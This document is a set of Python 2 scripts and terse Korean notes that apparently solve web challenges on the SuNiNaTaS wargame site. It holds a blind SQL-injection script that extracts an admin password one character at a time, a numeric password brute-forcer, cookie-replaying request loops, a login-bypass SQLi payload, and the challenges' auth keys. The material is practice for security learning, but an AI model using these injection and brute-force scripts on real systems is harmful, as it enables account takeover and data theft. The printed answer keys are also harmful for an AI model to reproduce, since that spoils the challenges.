SSo

import urllib, urllib2, sys

url = "http://suninatas.com/Part_one/web22/web22.asp?"
#string = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*()_+|\?><"
key = ""

for i in range(1,11):
    for j in range(30,126):
        dat = {'id': "admin' and (substring(pw,"+str(i)+",1)='"+chr(j)+"')-- ", 'pw': '1'}
        dat = urllib.urlencode(dat)
        req = urllib2.Request(url, dat,headers={'Host':'suninatas.com',
                                                'Cookie': 'ASPSESSIONIDQATDBBCA=HEFDDLLDNHPHJJECHJOCLANO'})
        res = urllib2.urlopen(req).read()
        print "i:"+ str(i) + "j:"+str(j)
        if "color=blue>admin" in res:
            print "[*]Find string! : " + chr(j)
            key += chr(j)
            break
            sys.exit(1)

print "[+]FIND! : " + key

import urllib, urllib2

url = "http://suninatas.com/Part_one/web08/web08.asp"

#User_Agent = "SuNiNaTaS"
i = ""
for i in range(7600,10000):
    dat = {'id': 'admin', 'pw': i}
    dat = urllib.urlencode(dat)
    print dat
    header = {'Cookie': "ASPSESSIONIDCCRBCADD=FMCHFPOCKMPIDIOPDCBFBLCE"}

    req = urllib2.Request(url, dat, headers=header)
#req.add_header=('User-Agent', User_Agent)

    res = urllib2.urlopen(req).read()
    if "Password Incorrect!" not in res:
        print "[*]Find Auth Key!" + str(i)
        break
        sys.exit(1)

import urllib, urllib2

url = "http://suninatas.com/Part_one/web07/web07.asp"
url2 = "http://suninatas.com/Part_one/web07/web07_1.asp"

header = {'Cookie': "ASPSESSIONIDCCRBCADD=FMCHFPOCKMPIDIOPDCBFBLCE"}

req = urllib2.Request(url, headers=header)

res = urllib2.urlopen(req).read()
req1 = urllib2.Request(url2, headers=header)
res = urllib2.urlopen(req1).read()
print res

README 글 비밀번호 쿼리

"select szPwd from T_Web13 where nIdx = '3' and szPwd = '"&pwd&"'"

sqli -> ' or '1' like '1

authkey = suninatastopofworld!

md5(authkey) = 65038b0559e459420aa2d23093d01e4a

쿠키에 입력

Rome's First Emperor를 구글링

auth key = Augustus

<!--Hint : 12342046413275659 -->

eval 함수 -> alert 변경

import urllib, urllib2, sys

url = "http://suninatas.com/Part_one/web04/web04_ck.asp"
url2 = "http://suninatas.com/Part_one/web04/web04.asp"
dat = {'total': '49'}
dat = urllib.urlencode(dat)
for i in range(50):
    req = urllib2.Request(url, dat,headers={'Host':'suninatas.com',
                                        'User-Agent': 'SuNiNaTaS',
                                        'Cookie': 'ASPSESSIONIDCCRBCADD=BBDHFPOCLPILDJPDNCKOAPKN'})
    res = urllib2.urlopen(req).read()
    req = urllib2.Request(url2, dat, headers={'Host':'suninatas.com',
                                        'User-Agent': 'SuNiNaTaS',
                                        'Cookie': 'ASPSESSIONIDCCRBCADD=BBDHFPOCLPILDJPDNCKOAPKN'})
    res = urllib2.urlopen(req).read()
    if ">?????"  not in res:
        print "[*]Find Key : "
        print res
        sys.exit(1)